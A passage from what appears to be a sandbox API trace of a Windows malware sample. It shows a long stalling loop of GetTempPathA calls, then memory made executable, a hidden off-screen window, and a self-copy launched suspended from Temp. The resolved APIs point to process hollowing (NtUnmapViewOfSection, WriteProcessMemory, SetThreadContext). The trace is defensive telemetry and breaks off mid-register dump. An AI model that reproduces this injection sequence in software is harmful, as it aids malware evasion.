lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.227] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.304] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.305] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.306] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.307] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.472] VirtualProtect (in: lpAddress=0x1d3540, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0108.473] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0108.473] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0108.473] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0108.473] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0108.473] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0108.473] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.474] GetProcAddress 
(hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0108.474] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0108.474] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0108.474] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0108.474] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0108.475] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0108.475] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0108.475] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0108.475] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0108.475] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0108.475] CreateWindowExA (dwExStyle=0x200, 
lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x7019a [0108.701] PostMessageA (hWnd=0x7019a, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0108.701] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0108.702] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0108.702] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x390000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.702] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.702] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", 
lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xcc0, dwThreadId=0xcc4)) returned 1 [0108.704] VirtualFree (lpAddress=0x390000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0108.704] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0108.704] GetThreadContext (in: hThread=0x48, lpContext=0x390000 | out: lpContext=0x390000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, 
[29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, 